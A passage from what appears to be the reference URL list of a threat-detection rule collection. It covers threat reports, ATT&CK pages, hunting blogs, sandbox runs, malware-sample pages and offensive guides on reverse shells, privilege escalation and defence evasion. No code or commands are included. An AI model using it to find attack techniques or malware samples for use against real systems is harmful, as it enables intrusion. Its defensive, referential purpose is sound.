ry.splunk.com/advisories/SVD-2023-1104\nhttps://akhere.hashnode.dev/hunting-unsigned-dlls-using-kql\nhttps://alamot.github.io/reverse_shells/\nhttps://alternativeto.net/news/2023/5/cybercriminals-use-wordpad-vulnerability-to-spread-qbot-malware/\nhttps://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/\nhttps://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3\nhttps://answers.microsoft.com/en-us/prote
ct/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e\nhttps://antgarsil.github.io/posts/velocity/\nhttps://any-api.com/amazonaws_com/eks/docs/API_Description\nhttps://any-api.com/googleapis_com/compute/docs/vpnTunnels\nhttps://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6\nhttps://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e\nhttps://anydesk.com/en/changelog/windows\nhttps://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/\nhttps://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/\nhttps://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\nhttps://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/\nhttps://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/\nhttps://app.any.run/tasks/25970bb5-f864-4e9e-9e1b-cc8ff9e6386a\nhttps://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/\nhttps://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/\nhttps://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/\nhttps://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/\nhttps://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/\nhttps://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/\nhttps://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/\nhttps://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406\nhttps://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/\nhttps://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/\nhttps://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/\nhttps://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965\nhttps://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b\nhttps://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e\nhttps://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/\nhttps://app.any.run/tasks/64043a79-165f-4052-bcba-e6e49f847ec1/\nhtt
ps://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/\nhttps://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/\nhttps://app.any.run/tasks/6720b85b-9c53-4a12-b1dc-73052a78477d\nhttps://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/\nhttps://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#\nhttps://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/\nhttps://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/\nhttps://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/\nhttps://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/\nhttps://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb\nhttps://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/\nhttps://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/\nhttps://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/\nhttps://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/\nhttps://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/\nhttps://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/\nhttps://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/\nhttps://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/\nhttps://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3\nhttps://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/\nhttps://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/\nhttps://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/\nhttps://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/\nhttps://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/\nhttps://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4\nhttps://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/\nhttps://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/\nhttps://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/\nhttps://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/\nhttps://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/\nhttps://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a80874
76a6d0\nhttps://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/\nhttps://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/\nhttps://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/\nhttps://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/\nhttps://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/\nhttps://app.any.run/tasks/ec207948-4916-47eb-a0f4-4c6abb2e7668/\nhttps://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/\nhttps://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/\nhttps://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03\nhttps://app.any.run/tasks/fa99cedc-9d2f-4115-a08e-291429ce3692\nhttps://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\nhttps://artkond.com/2017/03/23/pivoting-guide/\nhttps://asec.ahnlab.com/en/38156/\nhttps://asec.ahnlab.com/en/39828/\nhttps://asec.ahnlab.com/en/58878/\nhttps://asec.ahnlab.com/en/61000/\nhttps://asec.ahnlab.com/en/78944/\nhttps://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf\nhttps://atomicredteam.io/defense-evasion/T1220/\nhttps://attack.mitre.org/datasources/DS0005/\nhttps://attack.mitre.org/groups/G0010/\nhttps://attack.mitre.org/matrices/enterprise/cloud/\nhttps://attack.mitre.org/software/S0108/\nhttps://attack.mitre.org/software/S0404/\nhttps://attack.mitre.org/techniques/T1021/001/\nhttps://attack.mitre.org/techniques/T1064\nhttps://attack.mitre.org/techniques/T1090/\nhttps://attack.mitre.org/techniques/T1105/\nhttps://attack.mitre.org/techniques/T1548/001/\nhttps://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966\nhttps://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis\nhttps://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis\nhttps://awakesecurity.com/blog/threat-hunting-for-paexec/\nhttps://bad-jubies.github.io/RCE-NOW-WHAT/\nhttps://badoption.eu/blog/2023/01/31/code_c2.html\nhttps://bazaar.abuse.ch/browse/sign
ature/RaspberryRobin/\nhttps://bazaar.abuse.ch/sample/64e6605496919cd76554915cbed88e56fdec10dec6523918a631754664b8c8d3/\nhttps://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/\nhttps://bazaar.abuse.ch/sample/8c75f8e94486f5bbf461505823f5779f328c5b37f1387c18791e0c21f3fdd576/\nhttps://bczyz1.github.io/2021/01/30/psexec.html\nhttps://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection\nhttps://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319\nhttps://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c\nhttps://bi-zone.medium.com/hunting-for-zerologon-f65c61586382\nhttps://bidouillesecurity.com/disable-windows-defender-in-powershell/\nhttps://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware\nhttps://blackpointcyber.com/resources/blog/breaking-through-the-screen/\nhttps://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html\nhttps://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html\nhttps://blog.alsid.eu/dcshadow-explained-4510f52fc19d\nhttps://blog.alyac.co.kr/1901\nhttps://blog.aquasec.com/container-security-tnt-container-attack\nhttps://blog.assetnote.io/2021/11/02/sitecore-rce/\nhttps://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/\nhttps://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis\nhttps://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r\nhttps://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html\nhttps://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/\nhttps://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt\nhttps://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/\nhttps://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/\nhttps://blog.cobaltstrik
e.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/\nhttps://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/\nhttps://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/\nhttps://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/\nhttps://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/\nhttps://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/\nhttps://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/\nhttps://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/\nhttps://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/\nhttps://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/\nhttps://blog.dylan.codes/evading-sysmon-and-windows-event-logging/\nhttps://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns\nhttps://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/\nhttps://blog.f-secure.com/analysis-of-lockergoga-ransomware/\nhttps://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/\nhttps://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf\nhttps://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/\nhttps://blog.hackvens.fr/articles/CoercedPotato.html\nhttps://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/\nhttps://blog.harmj0y.net/redteaming/another-word-on-delegation/\nhttps://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus\nhttps://blog.hrncirik.net/cve-2023-46214-analysis\nhttps://blog.jourdant.me/post/3-ways-to-download-files-with-powershell\nhttps://blog.lexfo.fr/Forensics-xortigate-notice.html\nhttps://blog.lexfo.fr/xortigate-cve-2023-27997.html\nhttps://blog.malwarebytes.com/malwarebytes-ne
ws/2020/10/kraken-attack-abuses-wer-service/\nhttps://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/\nhttps://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/\nhttps://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/\nhttps://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/\nhttps://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/\nhttps://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html\nhttps://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html\nhttps://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html\nhttps://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html\nhttps://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html\nhttps://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html\nhttps://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html\nhttps://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html\nhttps://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html\nhttps://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign\nhttps://blog.morphisec.com/vmware-identity-manager-attack-backdoor\nhttps://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\nhttps://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html\nhttps://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/\nhttps://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments\nhttps://blog.reconinfosec.com/emergence-of-akira-ransomware-group\nhttps://blog.redbluepurple.io/offensive-research/bypassing-injection-detectio
n\nhttps://blog.redteam.pl/2020/06/black-kingdom-ransomware.html\nhttps://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/\nhttps://blog.router-switch.com/2013/11/show-running-config/\nhttps://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar\nhttps://blog.sekoia.io/darkgate-internals/\nhttps://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/\nhttps://blog.skyplabs.net/posts/container-detection/\nhttps://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/\nhttps://blog.sygnia.co/kaseya-ransomware-supply-chain-attack\nhttps://blog.talosintelligence.com/2017/05/wannacry.html\nhttps://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html\nhttps://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1\nhttps://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\nhttps://blog.talosintelligence.com/gophish-powerrat-dcrat/\nhttps://blog.talosintelligence.com/ipfs-abuse/\nhttps://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/\nhttps://blog.talosintelligence.com/uat-5647-romcom/\nhttps://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/\nhttps://blog.thickmints.dev/mintsights/detecting-rogue-rdp/\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/\nhttps://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/\nhttps://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/\nhttps://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/\nhttps://blog.viettelcybersecurity.com/saml-show-stopper/\nhttps://blog.xpnsec.com/explorin
g-mimikatz-part-1/\nhttps://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/\nhttps://blog.yoroi.company/research/ursnif-long-live-the-steganography/\nhttps://blogs.blackberry.com/\nhttps://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line\nhttps://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains\nhttps://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets\nhttps://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine\nhttps://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nhttps://blogs.jpcert.or.jp/en/2022/07/yamabot.html\nhttps://blogs.jpcert.or.jp/en/2023/05/gobrat.html\nhttps://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild\nhttps://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/\nhttps://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\nhttps://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html\nhttps://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html\nhttps://blooteem.com/march-2022\nhttps://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html\nhttps://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2\nhttps://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d\nhttps://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/\nhttps://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/\nhttps://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction
/\nhttps://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/\nhttps://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/\nhttps://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/\nhttps://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/\nhttps://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/\nhttps://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/\nhttps://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/\nhttps://boinc.berkeley.edu/\nhttps://book.hacktricks.xyz/pentesting-web/file-inclusion\nhttps://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection\nhttps://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection\nhttps://book.hacktricks.xyz/shells/shells/linux\nhttps://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dsrm-credentials\nhttps://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation\nhttps://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry\nhttps://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords\nhttps://book.hacktricks.xyz/windows/basic-cmd-for-pentesters\nhttps://bpftrace.org/\nhttps://breakdev.org/pwndrop/\nhttps://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/\nhttps://brightsec.com/blog/sql-injection-payloads/\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5\nhttps://bunnyinside.com/?term=f71e8cb9c76a\nhttps://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit\nhttps://car.mitre.org/wiki/CAR-2013-05-002\nhttps://car.mitre.org/wiki/CAR-2016-04-005\nhttps://center-for-threat-i
nformed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/\nhttps://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/task_scheduling/\nhttps://chromeenterprise.google/policies/?policy=DnsOverHttpsMode\nhttps://chromium.googlesource.com/chromium/chromium/+/master/content/public/common/content_switches.cc\nhttps://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/\nhttps://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/\nhttps://cloud.google.com/access-context-manager/docs/audit-logging\nhttps://cloud.google.com/binary-authorization\nhttps://cloud.google.com/blog/topics/threat-intelligence/alphv-ransomware-backup/\nhttps://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/\nhttps://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify\nhttps://cloud.google.com/dns/docs/reference/v1/managedZones\nhttps://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts\nhttps://cloud.google.com/kubernetes-engine/docs\nhttps://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging\nhttps://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control\nhttps://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3\nhttps://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog\nhttps://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update\nhttps://cloud.google.com/storage/docs/json_api/v1/buckets\nhttps://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc\nhttps://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance\nhttps://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/\nhttps://cobalt.io/blog/kerberoast-attack-techniques\nhttps://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html\nhttps://co
comelonc.github.io/persistence/2022/12/09/malware-pers-20.html\nhttps://code.visualstudio.com/docs/remote/tunnels\nhttps://codewhitesec.blogspot.com/2018/07/lethalhta.html\nhttps://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html\nhttps://commandk.dev/blog/guide-to-audit-k8s-secrets-for-compliance/\nhttps://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer\nhttps://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029\nhttps://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516\nhttps://community.fortinet.com/t5/FortiGate/Technical-Tip-Critical-vulnerability-Protect-against-heap-based/ta-p/239420\nhttps://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023\nhttps://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists\nhttps://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting\nhttps://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3\nhttps://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers\nhttps://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics\nhttps://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection\nhttps://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html\nhttps://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\nhttps://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html\nhttps://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html\nhttps://confluence.atlassian.com/bitbucketserver/global-
permissions-776640369.html\nhttps://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html\nhttps://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html\nhttps://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html\nhttps://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\nhttps://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html\nhttps://content.fireeye.com/apt-41/rpt-apt41\nhttps://core.telegram.org/bots/faq\nhttps://corelight.com/blog/detecting-cve-2021-42292\nhttps://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/\nhttps://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/\nhttps://csirt-cti.net/2024/02/01/stately-taurus-continued-new-information-on-cyberespionage-attacks-against-myanmar-military-junta/\nhttps://curl.se/docs/manpage.html\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-49144\nhttps://cyber.wtf/2021/11/15/guess-whos-back/\nhttps://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\nhttps://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29\nhttps://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/\nhttps://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/\nhttps://cybersecuritynews.com/rhysida-ransomware-attacking-windows/\nhttps://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/\nhttps://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/\nhttps://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/\nhttps://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\nhttps://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-n
ew-wave-of-phishing-attacks/\nhttps://cydefops.com/devtunnels-unleashed\nhttps://cydefops.com/vscode-data-exfiltration\nhttps://darkdefender.medium.com/windows-10-mail-app-forensics-39025f5418d2\nhttps://dataconomy.com/2023/10/23/okta-data-breach/\nhttps://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/\nhttps://decoded.avast.io/martinchlumecky/png-steganography\nhttps://decoded.avast.io/martinchlumecky/png-steganography/\nhttps://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/\nhttps://defr0ggy.github.io/research/Abusing-Cloudflared-A-Proxy-Service-To-Host-Share-Applications/\nhttps://defr0ggy.github.io/research/Utilizing-BTunnel-For-Data-Exfiltration/\nhttps://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk\nhttps://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623\nhttps://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/\nhttps://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181\nhttps://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/\nhttps://devco.re/blog/2024/08/23/streaming-vulnerabilities-from-windows-kernel-proxying-to-kernel-part1-en/\nhttps://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html\nhttps://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_network.html\nhttps://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_storage.html\nhttps://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html\nhttps://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vsan.html\nhttps://developer.okta.com/docs/reference/api/event-types/\nhttps://developer.okta.com/docs/reference/api/system-log/\nhttps://dev
eloper.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_network.html\nhttps://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_storage.html\nhttps://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html\nhttps://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html\nhttps://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vsan.html\nhttps://developers.cloudflare.com/cloudflare-one/connections/connect-apps\nhttps://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_S